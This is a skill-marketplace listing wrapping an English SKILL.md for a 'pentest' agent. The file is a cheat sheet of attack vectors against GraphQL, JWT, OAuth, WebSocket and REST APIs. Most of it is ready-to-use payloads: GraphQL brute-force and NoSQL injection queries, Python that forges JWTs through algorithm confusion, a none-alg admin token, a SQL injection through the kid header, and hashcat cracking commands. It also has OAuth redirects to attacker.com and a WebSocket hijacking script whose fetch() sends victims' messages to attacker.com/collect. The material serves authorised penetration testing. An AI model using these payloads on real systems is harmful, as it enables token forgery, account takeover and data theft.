pentest-protocols
Pentest: GraphQL, JWT, OAuth, WebSocket, REST API — protocol-specific attack vectors.
소스 정보
- 저장소
- aurict/aurict
- 최근 소스 활동
- 2026년 6월 24일 19:34
- 감지된 SKILL.md 언어
- 영어
- 스타
- 33
- 포크
- 2
설치 방법
기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.
소스 파일 검토
설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.
SKILL.md 표시 중
SKILL.md
소스 지침 · 읽기 전용 미리보기- name
- pentest-protocols
- description
- Pentest: GraphQL, JWT, OAuth, WebSocket, REST API — protocol-specific attack vectors.
- triggers
- {"keywords":["graphql","jwt","oauth","websocket","api security","token","bearer","introspection","authorization code","refresh token"]}
- auto_load_when
- Testing API protocols, authentication flows, or real-time communication security
- agent
- pentest
- tools
- ["Read","Bash","WebFetch"]
# Protocol Security — Attack Vectors
---
## GraphQL
### Introspection (information disclosure)
```bash
# Check if introspection is enabled
curl -s -X POST TARGET/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name } } }"}'
# Full schema dump
curl -s -X POST TARGET/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { queryType { fields { name description args { name type { name } } } } } }"}'
```
### Batch query abuse (rate limit bypass)
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"}
]
```
### IDOR via GraphQL
```graphql
# Try accessing other users' data by changing IDs
query { user(id: "1") { email, password_hash, admin } }
query { user(id: "2") { email, password_hash, admin } }
```
### NoSQL injection via GraphQL variables
```json
{"query": "query($user: String!) { login(username: $user) }",
"variables": {"user": {"$gt": ""}}}
```
---
## JWT
### Algorithm confusion (RS256 → HS256)
```python
# 1. Get the server's public key from /jwks.json or /.well-known/openid-configuration
# 2. Modify JWT header: {"alg": "HS256"}
# 3. Sign with the PUBLIC KEY as HMAC secret
import hmac, hashlib, base64, json
header = base64.urlsafe_b64encode(json.dumps({"alg":"HS256","typ":"JWT"}).encode()).rstrip(b'=')
payload = base64.urlsafe_b64encode(json.dumps({"sub":"admin","role":"admin"}).encode()).rstrip(b'=')
sig_input = header + b'.' + payload
signature = base64.urlsafe_b64encode(hmac.new(PUBLIC_KEY_BYTES, sig_input, hashlib.sha256).digest()).rstrip(b'=')
forged_token = (header + b'.' + payload + b'.' + signature).decode()
```
### None algorithm
```
# Header: {"alg":"none","typ":"JWT"}
# Payload: {"sub":"admin","role":"admin"}
# No signature — just append trailing dot
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.
```
### Key confusion (kid header injection)
```json
// If kid header is used in a SQL query:
{"kid": "' UNION SELECT 'secret'-- "}
// If kid is a file path:
{"kid": "/dev/null"} // results in empty key → sign with empty string
```
### JWT cracking (weak secret)
```bash
hashcat -a 0 -m 16500 JWT_TOKEN /usr/share/wordlists/rockyou.txt
# or
python3 jwt_tool.py JWT_TOKEN -C -d wordlist.txt
```
---
## OAuth 2.0
### Authorization code interception
```
# 1. Craft a malicious redirect_uri not on the allowlist
/oauth/authorize?client_id=app&redirect_uri=https://attacker.com&response_type=code
# 2. Open redirect chaining: find open redirect in allowed domain
/oauth/authorize?...&redirect_uri=https://ALLOWED.com/redirect?next=https://attacker.com
```
### State parameter CSRF
```
# If state is absent or predictable → CSRF on OAuth flow
# Attacker initiates OAuth, intercepts the redirect, uses victim's code
```
### Token leakage via Referer
```
# If access_token is in fragment (#) and page loads external resources
# Token may appear in Referer header to third-party servers
```
### Insufficient scope validation
```
# Request a token with minimal scope
# Try to use it for higher-privileged operations
GET /api/admin/users (with a read:profile token)
```
---
## WebSocket
### Message tampering
```javascript
// Connect and intercept: use Burp Suite WebSocket history
// Or via browser console:
const ws = new WebSocket('wss://TARGET/ws');
ws.onmessage = (e) => console.log(e.data);
ws.send(JSON.stringify({"action": "getUser", "userId": 1}));
ws.send(JSON.stringify({"action": "getUser", "userId": 2})); // IDOR
```
### Cross-Site WebSocket Hijacking (CSWSH)
```html
<!-- Host on attacker server — victim visits, their WS session is hijacked -->
<script>
var ws = new WebSocket('wss://TARGET/ws');
ws.onmessage = function(e) {
fetch('https://attacker.com/collect?data=' + encodeURIComponent(e.data));
};
</script>
```
**Requires:** WebSocket connection authenticated only via cookies (no CSRF token).
### Authentication bypass
```
# Test if WS endpoint requires the same auth as REST
# Connect to WS with no/expired token — see if messages are processed
```
---
## REST API
### Mass assignment
```bash
# Add unexpected fields to a POST/PUT request
curl -X PUT TARGET/api/users/me \
-d '{"name":"user","role":"admin","isVerified":true,"credits":99999}'
```
### HTTP verb tampering
```bash
# Server may handle PATCH differently than PUT
curl -X PATCH TARGET/api/resource/1 -d '{"owner_id": 2}'
curl -X DELETE TARGET/api/resource/1 # unauthorized delete attempt
```
### Parameter pollution
```
GET /api/transfer?amount=100&recipient=victim&recipient=attacker
# Which recipient wins depends on the framework
```
### API versioning abuse
```
# New version may have security fixes — old version may not
GET /api/v1/users/admin (old version, possibly less restricted)
GET /api/v2/users/admin (new version, better controls)
```
### Rate limit bypass techniques
```
# IP rotation via X-Forwarded-For header spoofing
X-Forwarded-For: 1.2.3.4
# User-Agent rotation
# Distributed requests from different IPs
```
GitHub에서 보기